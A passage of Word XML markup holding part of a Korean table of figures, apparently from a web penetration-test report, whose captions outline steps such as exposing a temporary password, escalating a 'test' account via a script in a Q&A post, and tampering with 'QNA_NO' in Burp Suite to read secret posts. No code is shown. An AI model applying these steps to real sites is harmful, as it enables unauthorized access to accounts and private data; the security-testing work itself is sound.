          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F107154" w14:textId="6BB5D42B" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094616" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 43. 임시 비밀번호 노출 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094616 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74D86FA4" w14:textId="4C5033BF" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094617" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 44. “test” 계정 권한 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094617 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E3FD566" w14:textId="4DB02EC5" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094618" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 45. “test” 계정 로그인 후, 메인에서 “고객센터” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094618 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61EA7668" w14:textId="26C569E1" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094619" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 46. “QNA” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094619 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7ACD5123" w14:textId="66555445" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094620" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 47. “글쓰기” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094620 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31AEB85B" w14:textId="6AD85642" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094621" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 48. QNA 작성 본문에 “test” 계정 권한 상승 스크립트 작성</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094621 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16E352A7" w14:textId="19D03BEA" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094622" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 49. 작성한 게시물 선택</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094622 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29E6911C" w14:textId="1922FC43" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094623" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 50. 작성된 게시물 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094623 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D599ABE" w14:textId="69CC6865" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094624" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 51. “test” 계정 권한 상승 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094624 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41922E02" w14:textId="2F5DD70B" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094625" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 52. “고객센터” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094625 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FFBEB67" w14:textId="75CB2B65" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094626" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 53. QNA 페이지에서 Burp Suite -&gt; Intercept on 후, 공개 게시물에 접근</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094626 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E829EBE" w14:textId="33272F63" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094627" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 54. 게시물 접근 시 필요한 파라미터 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094627 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1410AE13" w14:textId="355570EB" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094628" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 55. 비밀 게시물의 “QNA_NO” 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094628 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EF2DA94" w14:textId="2137F8E8" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094629" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 56. Burp Suite -&gt; Intercept on 후, “QNA_NO”을 24로 변경</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094629 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25B84B24" w14:textId="77B574B7" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094630" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 57. 비밀 게시물에 접근 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094630 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A2762B8" w14:textId="7A088F29" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094631" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 58. Burp Suite -&gt; Intercept on 후, 비로그인 상태에서 새로고침</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094631 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="440300FD" w14:textId="1C38A3F9" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094632" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 59. 비로그인 상태에서의 JSESSIONID값 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094632 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4249C313" w14:textId="7EB0D396" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
